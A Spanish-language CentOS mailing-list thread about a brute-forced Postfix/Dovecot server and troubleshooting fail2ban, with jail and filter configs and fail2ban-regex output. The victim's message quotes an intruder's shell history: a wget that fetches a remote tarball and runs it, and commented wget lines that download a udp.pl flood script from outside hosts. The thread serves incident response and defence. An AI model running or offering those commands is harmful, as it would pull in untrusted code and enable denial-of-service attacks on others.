[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

Diego Sanchez diegors en gmail.com
Sab Abr 6 01:54:15 UTC 2013 

Hola Luis
Podrías poner la config de fail2ban en algun servicio que respete los
saltos de linea? (pastebin, por ejemplo)
Asegurate de eliminar todos los datos de tu server antes...

Comprobaste que este matcheando la regla contra el log?
Lo haces asi, obviamente, reemplazando  donde haga falta

Mi prueba la hice contra sshd

root en proxy ~/ # fail2ban-client status
Status
|- Number of jail:      2
`- Jail list:           apache-badUsersAuth, ssh
root en proxy ~/ # fail2ban-client status ssh
Status for the jail: ssh
|- filter
|  |- File list:        /var/log/secure
|  |- Currently failed: 0
|  `- Total failed:     84
`- action
   |- Currently banned: 5
   |  `- IP list:       200.192.153.132 115.95.166.247 119.134.244.22
166.111.230.4 122.226.160.19
   `- Total banned:     5
root en proxy ~/ # fail2ban-regex /var/log/secure /etc/fail2ban/filter.d/sshd.conf

Running tests
=============

Use regex file : /etc/fail2ban/filter.d/sshd.conf
Use log file   : /var/log/secure

[[ mucho mucho texto e ips ]]
Date template hits:
92938 hit(s): MONTH Day Hour:Minute:Second

Success, the total number of match is 3181

However, look at the above section 'Running tests' which could contain important
information.
root en proxy ~/ #

El día 5 de abril de 2013 12:12, Luis Alberto Roman Aguirre
<luisroman80 en hotmail.com> escribió:
> Buenas amigos Listeros:
> Retomando el tema del servidor de correos, perdón por el retraso, y  agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch Canu,Jose Fernández Rodríguez,Francesc Guitart  ...a la LISTA en GENERAL ..y  si me olvide de alguien mil disculpas.
> Bueno, es comento que los días posteriores fue tanto el escaneo que al final tomaron posesión de mi servidor a través de un usuario el cual borre pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este archivo:
>
>
>
>
>   wget
>   www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz
>   tar -pxzf csservers_redirecte_linux_hlds.tar.gz
>   ps x
>   killall screen
>   ps x
>   free -m
>   screen
>   cd csservers_redirecte_linux_hlds
>   ./start
>   cd ..
>
>
>
>   #wget
>   http://y2khom3.evonet.ro/udp.pl
>   #wget
>   www.buble.biz/alinftp/udp.pl
>   #wget
>   www.packetstormsecurity.org/DoS/udp.pl
>   #ps x
>   #cd /tmp
>   #ls -a
>   #w
>
>
>
>
>
>
> Ahora les detallo que ingresaron por un usuario el cual hace reenvio de correos a nivel local el cual no tenia contraseña, en el nuevo servidor le puse contraseña a todos los usuarios y demas con caracteres(mayusculas,minusculas y  numeros). Lo que me sorprende fue aun despues de reinstalar el centos , creo ya que me agarraron de punto , porque note que sigo siendo escaneado  por la misma lista antes de la reinstalacion les copio parte y  les adjunto en txt:dovecot: Authentication
> Failures:base: 1376
> Time(s)root: 52
> Time(s)postmaster
> rhost=190.210.136.21 : 32 Time(s)mlizana
> rhost=10.1.0.28 : 20 Time(s)aa
> rhost=113.162.161.245 : 18 Time(s)admin
> rhost=183.60.20.40 : 14 Time(s)mconde: 10
> Time(s)test
> rhost=183.60.20.40 : 10 Time(s)admin1
> rhost=183.60.20.40 : 8 Time(s)dedicated
> rhost=183.60.20.40 : 8 Time(s)html
> rhost=183.60.20.40 : 8 Time(s)user1
> rhost=183.60.20.40 : 8 Time(s)bdsistemas:
> 6 Time(s)
> La ip segun lo investigado es de China: http://whatismyipaddress.com/ip/183.60.20.40 y  salio esto:(ojo hay  otro router que salio mientras escribía es este http://201.77.5.191/ de Brazil)General IP InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet Guangdong Province NetworkOrganization:ChinaNet Guangdong Province NetworkServices:None detectedType:BroadbandAssignment:Static IPBlacklist:Geolocation InformationCountry:China State/Region:GuangdongCity:GuangzhouLatitude:23.1167  (23° 7′ 0.12″ N)Longitude:113.25  (113° 15′ 0.00″ E)
>
> Por recomendación de los ya mencionados amigos instale el fail2ban pero  creo que no hace nada o  bien algo estoy  haciendo mal ,posteo configuracion:####Jail.conf[dovecot-pop3imap]enabled  = truefilter   = dovecot-pop3imapaction   = iptables-multiport[name=dovecot-pop3imap, port="pop3,pop3s,imap,imaps", protocol=tcp]           sendmail-whois[name=dovecot-pop3imap, dest=root, sender=user en xxx.xxx]logpath  = /var/log/maillogmaxretry = 2#findtime = 600bantime  = 5200
> En la carpeta filter.d/dovecot-pop3imap.conf tengo esto:[Definition]failregex = dovecot: auth-worker\(default\): sql\(.*,<HOST>\): unknown user            dovecot: (pop3|imap)-login: Aborted login \(.*\): .*, \[<HOST>\]            dovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[<HOST>\]            dovecot: auth\(default\): passdb\(.*,<HOST>\)\: Attempted login with password having illegal chars            dovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[<HOST>\]            dovecot: (pop3|imap)-login: Aborted login: .*, \[<HOST>\]ignoreregex =
> La cosa que los escaneos que me hacen al dovecot  el fail2ban no tiene idea de ellos, algo estoy  haciendo mal?, estoy  por probar el OSSEC, pero si hay  otra herramienta o  bien algo mas que se pueda hacer, ya que ser victima de nuevo  y  lo peor que me baneen en la black list para una empresa que depende del correo es lo  peor que les puede suceder, hablo por la experiencia amigos.
>
> Gracias por la ayuda , por leer este mail, y  por soportarme amigos, desde ya muchas gracias por sus respuestas.PDT:prometo responder como me fue , asi ayudar a alguien mas que pueda tener este problema
> Atte.
> Luis Roman
>
>
>
>
>
>
> _______________________________________________
> CentOS-es mailing list
> CentOS-es en centos.org
> http://lists.centos.org/mailman/listinfo/centos-es
>



-- 
Diego - Yo no soy paranoico! (pero que me siguen, me siguen)

Más información sobre la lista de distribución CentOS-es